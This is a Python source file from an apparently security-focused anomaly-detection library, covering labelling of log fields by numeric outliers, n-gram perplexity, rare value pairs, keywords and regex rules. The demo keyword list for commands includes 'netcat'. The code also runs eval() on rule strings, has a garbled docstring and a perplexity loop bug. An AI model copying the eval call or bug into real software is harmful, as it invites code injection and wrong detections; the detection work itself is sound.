342 | if mean_val == 0:
343 | mean_val = 0.01
344 | spike_ratio = cur_value / mean_val
345 | else:
346 | if cur_value == 0:
347 | cur_value = 0.01
348 | spike_ratio = mean_val / cur_value
349 | elif spike == 'fixed':
350 | if not spike_inverse:
351 | spike_ratio = cur_value - mean_val
352 | else:
353 | spike_ratio = mean_val - cur_value
354 |
355 | field_name = self._model['field_name'].upper()
356 |
357 | if stdev and spike != 'none' and stdev_ratio < stdev_outlier_threshold:
358 | # if both are activated, and event is within stdev outlier threshold
359 | if label_for_normal:
360 | labels.append('{0}_NORMAL'.format(field_name))
361 | else:
362 | if stdev and spike == 'none':
363 | # only stdev is activated
364 | ratio = stdev_ratio
365 | borderline_threshold = stdev_borderline_threshold
366 | outlier_threshold = stdev_outlier_threshold
367 | else:
368 | # if only spike is activated or both are activated, use spike ratio
369 | ratio = spike_ratio
370 | borderline_threshold = spike_borderline_threshold
371 | outlier_threshold = spike_outlier_threshold
372 |
373 | if label_for_normal and ratio < borderline_threshold:
374 | labels.append('{0}_NORMAL'.format(field_name))
375 | elif borderline_threshold < ratio < outlier_threshold:
376 | labels.append('{0}_BORDERLINE'.format(field_name))
377 | elif ratio >= outlier_threshold:
378 | labels.append('{0}_OUTLIER'.format(field_name))
379 |
380 | return labels
381 |
382 | def __call__(self, input_object: dict) -> [str]:
383 | labels = []
384 | mean_val = self._model['mean']
385 | std_val = self._model['std_dev']
386 | count_val = self._model['count']
387 | field_name = self._model['field_name'].upper()
388 | label_for_normal = True
389 | if 'label_for_normal' in self._model:
390 | label_for_normal = self._model['label_for_normal']
391 |
392 | stdev = True
393 | if 'stdev' in self._model:
394 | stdev = bool(self._model['stdev'])
395 |
396 | stdev_borderline_threshold = 1
397 | if 'stdev_borderline_threshold' in self._model:
398 | stdev_borderline_threshold = self._model['stdev_borderline_threshold']
399 |
400 | stdev_outlier_threshold = 2
401 | if 'stdev_outlier_threshold' in self._model:
402 | stdev_outlier_threshold = self._model['stdev_outlier_threshold']
403 |
404 | spike = 'none'
405 | if 'spike' in self._model:
406 | spike = self._model['spike']
407 |
408 | spike_inverse = False
409 | if 'spike_inverse' in self._model:
410 | spike_inverse = bool(self._model['spike_inverse'])
411 |
412 | spike_borderline_threshold = 10
413 | if 'spike_borderline_threshold' in self._model:
414 | spike_borderline_threshold = self._model['spike_borderline_threshold']
415 |
416 | spike_outlier_threshold = 20
417 | if 'spike_outlier_threshold' in self._model:
418 | spike_outlier_threshold = self._model['spike_outlier_threshold']
419 |
420 | try:
421 | cur_value = float(input_object[self._model['field_name']])
422 | except:
423 | return ['{0}_BAD_VALUE'.format(field_name)]
424 | group_by = self._model['group_by']
425 | if group_by is None:
426 | new_labels = self._get_labels(cur_value,
427 | mean_val,
428 | std_val,
429 | stdev,
430 | stdev_borderline_threshold,
431 | stdev_outlier_threshold,
432 | spike,
433 | spike_inverse,
434 | spike_borderline_threshold,
435 | spike_outlier_threshold,
436 | label_for_normal)
437 | for label in new_labels:
438 | labels.append(label)
439 | # distance = abs((cur_value) - mean_val)
440 | # if label_for_normal and distance <= std_val:
441 | # labels.append(field_name + '_NORMAL')
442 | # elif std_val < distance <= (2 * std_val):
443 | # labels.append(field_name + '_BORDERLINE')
444 | # elif (2 * std_val) < distance:
445 | # labels.append(field_name + '_OUTLIER')
446 | else:
447 | key = self._get_group_by_value(input_object, group_by)
448 | if key in mean_val:
449 | count = count_val[key]
450 | if count > 5:
451 | new_labels = self._get_labels(cur_value,
452 | mean_val[key],
453 | std_val[key],
454 | stdev,
455 | stdev_borderline_threshold,
456 | stdev_outlier_threshold,
457 | spike,
458 | spike_inverse,
459 | spike_borderline_threshold,
460 | spike_outlier_threshold,
461 | label_for_normal)
462 | for label in new_labels:
463 | labels.append(label)
464 |
465 | # distance = abs((cur_value) - mean_val[key])
466 | #
467 | # if distance <= std_val[key]:
468 | # labels.append(field_name + '_NORMAL')
469 | # elif std_val[key] < distance <= (2 * std_val[key]):
470 | # labels.append(field_name + '_BORDERLINE')
471 | # elif (2 * std_val[key]) < distance:
472 | # labels.append(field_name + '_OUTLIER')
473 | else:
474 | labels.append('RARE_KEY_FOR_{0}'.format(field_name))
475 | else:
476 | labels.append('UNSEEN_KEY_FOR_{0}'.format(field_name))
477 |
478 | return labels
479 |
480 | @staticmethod
481 | def from_pretrained(pretrained: str) -> LabelGenerator:
482 | lg = NumericField()
483 | lg._model = json.loads(pretrained)
484 | return lg
485 |
486 |
487 | class TextField(LabelGenerator):
488 | """
489 | This type of LabelGenerator handles text fields. It builds a n-gram based language model and computes the
490 | perplexity of newly observed data. It also holds statistics over the training data (mean and stdev).
491 | (perplexity<=sigma NORMAL, sigma dict:
512 | unigram2count = {}
513 | for item in dataset:
514 | text = item[self._field_name]
515 | unigrams = self._get_ngrams(text, unigrams_only=True)
516 | occ_number = 1
517 | if count_column is not None:
518 | occ_number = item[count_column]
519 | for unigram in unigrams:
520 | if unigram not in unigram2count:
521 | unigram2count[unigram] = occ_number
522 | else:
523 | unigram2count[unigram] += occ_number
524 | for unigram in unigram2count:
525 | if unigram2count[unigram] > 2:
526 | self._accepted_unigrams[unigram] = 1
527 |
528 | for item in dataset:
529 | text = item[self._field_name]
530 | ngrams = self._get_ngrams(text)
531 | occ_number = 1
532 | if count_column is not None:
533 | occ_number = item[count_column]
534 | for ngram in ngrams:
535 | if len(ngram) == self._ngram_range[0]:
536 | self._total_inf += occ_number
537 | if ngram in self._model:
538 | self._model[ngram] += occ_number
539 | else:
540 | self._model[ngram] = occ_number
541 | # for ngram in self._model:
542 | # self._model[ngram] =
543 | ser_model = [self._field_name, self._lm_mode, self._ngram_range[0], self._ngram_range[1], self._mean_perplex,
544 | self._std_perplex, self._total_inf]
545 |
546 | all_perplex = np.zeros((len(dataset)), dtype=np.float)
547 | for ii in range(len(dataset)):
548 | text = item[self._field_name]
549 | all_perplex[ii] = self._compute_perplexity(text)
550 |
551 | self._mean_perplex = np.mean(all_perplex)
552 | self._std_perplex = np.std(all_perplex)
553 | ser_model[4] = self._mean_perplex
554 | ser_model[5] = self._std_perplex
555 | ser_model.append(self._accepted_unigrams)
556 | for item in self._model:
557 | ser_model.append(item)
558 | ser_model.append(self._model[item])
559 |
560 | return ser_model
561 |
562 | def _compute_perplexity(self, text):
563 | total = 0
564 | ngrams = self._get_ngrams(text)
565 |
566 | for ngram in ngrams:
567 | if ngram in self._model:
568 | sup_count = math.log(self._model[ngram]) + 1
569 | total += 1 / sup_count
570 | # if ngram[:-1] in self._model:
571 | # inf_count = self._model[ngram[:-1]]
572 | # else:
573 | # inf_count = self._total_inf
574 | # total += math.log(sup_count / inf_count)
575 | else:
576 | total += -math.log(1e-8) # small prob for unseen events
577 | return total / len(ngrams)
578 |
579 | def __call__(self, input_object: dict) -> [str]:
580 | perplexity = self._compute_perplexity(input_object[self._field_name])
581 | if perplexity - self._mean_perplex < 2 * self._std_perplex:
582 | return [perplexity * 10]
583 | elif perplexity - self._mean_perplex < 4 * self._std_perplex:
584 | return ['{0}_HIGH_PERPLEXITY'.format(self._field_name.upper()), perplexity * 10]
585 | else:
586 | return ['{0}_EXTREEME_PERPLEXITY'.format(self._field_name.upper()), perplexity * 10]
587 |
588 | @staticmethod
589 | def from_pretrained(pretrained: str) -> LabelGenerator:
590 | json_obj = json.loads(pretrained)
591 | field_name = json_obj[0]
592 | lm_mode = json_obj[1]
593 | ngram_range = (json_obj[2], json_obj[3])
594 | new_instance = TextField(field_name, lm_mode, ngram_range)
595 | new_instance._mean_perplex = json_obj[4]
596 | new_instance._std_perplex = json_obj[5]
597 | new_instance._total_inf = json_obj[6]
598 | new_instance._accepted_unigrams = json_obj[7]
599 | for ii in range((len(json_obj) - 8) // 2):
600 | ngram = tuple(json_obj[ii * 2 + 8])
601 | count = json_obj[ii * 2 + 8 + 1]
602 | new_instance._model[ngram] = count
603 | return new_instance
604 |
605 | def _get_ngrams(self, text, unigrams_only=False):
606 | text = str(text)
607 | use_chars = self._lm_mode == 'char'
608 | toks = Tokenizer.tokenize(text, use_chars=use_chars)
609 | if unigrams_only:
610 | return toks
611 | new_toks = []
612 | for tok in toks:
613 | if tok in self._accepted_unigrams:
614 | new_toks.append(tok)
615 | else:
616 | new_toks.append('')
617 | toks = new_toks
618 |
619 | # prepend and append
620 | c_append = self._ngram_range[0] - 1
621 | start = ['' for _ in range(c_append)]
622 | stop = ['' for _ in range(c_append)]
623 | toks = start + toks + stop
624 | ngrams = []
625 | for ngram_order in range(self._ngram_range[0], self._ngram_range[1] + 1):
626 | for ii in range(len(toks) - ngram_order):
627 | ngram = tuple(toks[ii:ii + ngram_order])
628 | ngrams.append(ngram)
629 | return ngrams
630 |
631 |
632 | class MultinomialField(LabelGenerator):
633 | def __init__(self, field_name: str = '', absolute_threshold: int = 10, relative_threshold: float = 0.1,
634 | group_by: str = None):
635 | """
636 | Constructor
637 | :param field_name: What field to use
638 | :param absolute_threshold: Minimum absolute value for occurrences to trigger alert for
639 | :param relative_threshold: Minimum relative value for occurrences to trigger alert for
640 | """
641 | self._mfc = MultinomialFieldCombiner([field_name], absolute_threshold, relative_threshold, group_by=group_by)
642 |
643 | def build_model(self, dataset: Datasource, count_column: str = None) -> dict:
644 | return self._mfc.build_model(dataset, count_column=count_column)
645 |
646 | def __call__(self, item: dict) -> [str]:
647 | lbls = self._mfc(item)
648 | lbls = [l.replace('_PAIR', '') for l in lbls]
649 | return lbls
650 |
651 | @staticmethod
652 | def from_pretrained(pretrained: str) -> LabelGenerator:
653 | lg = MultinomialFieldCombiner()
654 | lg._model = json.loads(pretrained)
655 | mf = MultinomialField()
656 | mf._mfc = lg
657 | return mf
658 |
659 |
660 | class MultinomialFieldCombiner(LabelGenerator):
661 | def __init__(self, field_names: [str] = [], absolute_threshold: int = 10, relative_threshold: float = 0.1,
662 | group_by: str = None):
663 | """
664 | Constructor
665 | :param field_names: What fields to combine
666 | :param absolute_threshold: Minimum absolute value for occurrences to trigger alert for
667 | :param relative_threshold: Minimum relative value for occurrences to trigger alert for
668 | """
669 | self._model = {'pair2count': {},
670 | 'pair2prob': {},
671 | 'absolute_threshold': absolute_threshold,
672 | 'relative_threshold': relative_threshold,
673 | 'field_names': field_names,
674 | 'group_by': group_by
675 | }
676 |
677 | def _get_group_by_value(self, item, group_by):
678 | if isinstance(group_by, str):
679 | return str(item[group_by])
680 | else:
681 | return "({0})".format(','.join([str(item[k]) for k in group_by]))
682 |
683 | def build_model(self, dataset: Datasource, count_column: str = None) -> dict:
684 | pair2count = self._model['pair2count'] # this is used for incremental updates
685 | group_by_field = self._model['group_by']
686 | total = 0
687 | for item in dataset:
688 | if group_by_field is not None:
689 | gbv = self._get_group_by_value(item, group_by_field) # str(item[group_by_field])
690 | if gbv not in self._model['pair2count']:
691 | self._model['pair2count'][gbv] = {'TOTAL': 0}
692 | pair2count = self._model['pair2count'][gbv]
693 | combined = [str(item[field]) for field in self._model['field_names']]
694 | combined = '(' + ','.join(combined) + ')'
695 | occ_number = 1
696 | if count_column is not None:
697 | occ_number = int(item[count_column])
698 | total += occ_number
699 | if group_by_field is not None:
700 | self._model['pair2count'][gbv]['TOTAL'] += occ_number
701 | if combined not in pair2count:
702 | pair2count[combined] = occ_number
703 | else:
704 | pair2count[combined] += occ_number
705 |
706 | pair2prob = {}
707 | if group_by_field is None:
708 | for key in pair2count:
709 | pair2prob[key] = pair2count[key] / total
710 | else:
711 | pair2count = self._model['pair2count']
712 | for k1 in pair2count:
713 | pair2prob[k1] = {}
714 | total = int(pair2count[k1]['TOTAL'])
715 | for key in pair2count[k1]:
716 | pair2prob[k1][key] = pair2count[k1][key] / total
717 |
718 | self._model['pair2count'] = pair2count
719 | self._model['pair2prob'] = pair2prob
720 |
721 | return self._model
722 |
723 | def __call__(self, item: dict) -> [str]:
724 | fname = ('_'.join(self._model['field_names'])).upper() + '_PAIR'
725 | gname = ''
726 | if self._model['group_by'] is not None:
727 | gby = self._model['group_by']
728 | if not isinstance(self._model['group_by'], list):
729 | gby = [gby]
730 | gname = '_BASED_ON_{0}'.format('_'.join([str(k).upper() for k in gby]))
731 | combined = [str(item[field]) for field in self._model['field_names']]
732 | combined = '(' + ','.join(combined) + ')'
733 |
734 | pair2prob = self._model['pair2prob']
735 | pair2count = self._model['pair2count']
736 | group_by = self._model['group_by']
737 | if group_by is not None:
738 | gbv = self._get_group_by_value(item, group_by)
739 | if gbv not in pair2prob:
740 | return []
741 | pair2prob = self._model['pair2prob'][gbv]
742 | pair2count = self._model['pair2count'][gbv]
743 |
744 | if combined not in pair2prob:
745 | return ['UNSEEN_{0}{1}'.format(fname, gname)]
746 | else:
747 | labels = []
748 |
749 | prob = pair2prob[combined]
750 | cnt = pair2count[combined]
751 |
752 | if cnt < self._model['absolute_threshold']:
753 | labels.append('LOW_OBS_COUNT_FOR_{0}{1}'.format(fname, gname))
754 | if prob < self._model['relative_threshold']:
755 | labels.append('LOW_OBS_PROB_FOR_{0}{1}'.format(fname, gname))
756 | return labels
757 |
758 | @staticmethod
759 | def from_pretrained(pretrained: str) -> LabelGenerator:
760 | lg = MultinomialFieldCombiner()
761 | lg._model = json.loads(pretrained)
762 | return lg
763 |
764 |
765 | class NumericalFieldCombiner(LabelGenerator):
766 | def __init__(self, field_names: [str], normalize=True):
767 | """
768 |
769 | :param field_names: What fields to combine
770 | :param normalize: Normalize each field using standard deviation before processing
771 | """
772 | self._field_names = field_names
773 | self._normalize = normalize
774 |
775 | def build_model(self, dataset: Datasource, count_column: str = None) -> dict:
776 | pass
777 |
778 | def __call__(self, input_object: dict) -> [str]:
779 | pass
780 |
781 | @staticmethod
782 | def from_pretrained(pretrained: str) -> LabelGenerator:
783 | pass
784 |
785 |
786 | class KeywordBased(LabelGenerator):
787 | def __init__(self, keyword_list: list, field_name: str):
788 | if isinstance(keyword_list, str):
789 | keyword_list = re.sub('[^0-9a-zA-Z]+', ' ', keyword_list)
790 | keyword_list = keyword_list.split(' ')
791 | self._label_list = [item for item in keyword_list]
792 | self._field_name = field_name
793 |
794 | def __call__(self, input_object: dict):
795 | label_list = []
796 | text = str(input_object[self._field_name])
797 | text = re.sub('[^0-9a-zA-Z]+', ' ', text)
798 | word_list = text.split(' ')
799 | for ii in range(len(self._label_list)):
800 | if self._label_list[ii] in word_list:
801 | label_list.append("{0}_KEYWORD_{1}".format(self._field_name.upper(), self._label_list[ii].upper()))
802 | return label_list
803 |
804 | def build_model(self, dataset: Datasource, count_column: str = None) -> dict:
805 | return {'field_name': self._field_name,
806 | 'keyword_list': self._label_list}
807 |
808 | @staticmethod
809 | def from_pretrained(pretrained: str) -> object:
810 | obj = json.loads(pretrained)
811 | keyword_list = obj['keyword_list']
812 | field_name = obj['field_name']
813 | klg = KeywordBased(keyword_list, field_name)
814 | return klg
815 |
816 |
817 | class KnowledgeBased(LabelGenerator):
818 | def __init__(self, rules_and_labels_tuple_list: list, field_name: str):
819 | if isinstance(rules_and_labels_tuple_list, str):
820 | # we need to parse this
821 | rules_and_labels_tuple_list = eval(rules_and_labels_tuple_list)
822 | self._regex_list = [re.compile(item[0]) for item in rules_and_labels_tuple_list]
823 | self._regex_list_str = [item[0] for item in rules_and_labels_tuple_list]
824 | self._label_list = [item[1] for item in rules_and_labels_tuple_list]
825 | self._field_name = field_name
826 |
827 | def __call__(self, input_object: dict) -> [str]:
828 | label_list = []
829 | text = str(input_object[self._field_name])
830 | for ii in range(len(self._label_list)):
831 | if self._regex_list[ii].search(text):
832 | label_list.append(self._label_list[ii])
833 | return label_list
834 |
835 | def build_model(self, dataset: Datasource, count_column: str = None) -> dict:
836 | return {
837 | 'field_name': self._field_name,
838 | 'label_list': self._label_list,
839 | 'regex_list': self._regex_list_str
840 | }
841 |
842 | @staticmethod
843 | def from_pretrained(pretrained: str) -> object:
844 | obj = json.loads(pretrained)
845 | label_list = obj['label_list']
846 | regex_list = obj['regex_list']
847 | field_name = obj['field_name']
848 | reg_lab = [(regex, label) for regex, label in zip(regex_list, label_list)]
849 | kblg = KnowledgeBased(reg_lab, field_name)
850 | return kblg
851 |
852 |
853 | if __name__ == '__main__':
854 | mfc = MultinomialFieldCombiner(['user', 'parent_process'], absolute_threshold=500, relative_threshold=0.005)
855 | nfc = NumericField('count')
856 | tf = TextField('command', lm_mode='token', ngram_range=(3, 5))
857 | klg = KeywordBased(keyword_list=['bash', 'java', 'netcat', 'sudo', 'apache2'], field_name='command')
858 | from osas.data.datasources import CSVDataSource
859 |
860 | dataset = CSVDataSource('corpus/test.csv')
861 | print("Building model")
862 | klg.build_model(dataset)
863 | print("Done")
864 |
865 | # rez = mfc.build_model(dataset)
866 | for item in dataset[:20]:
867 | print("\n\n")
868 | print(item)
869 | print("")
870 | print(klg(item))
871 | print("\n\n")
872 | print("=" * 20)
873 |
--------------------------------------------------------------------------------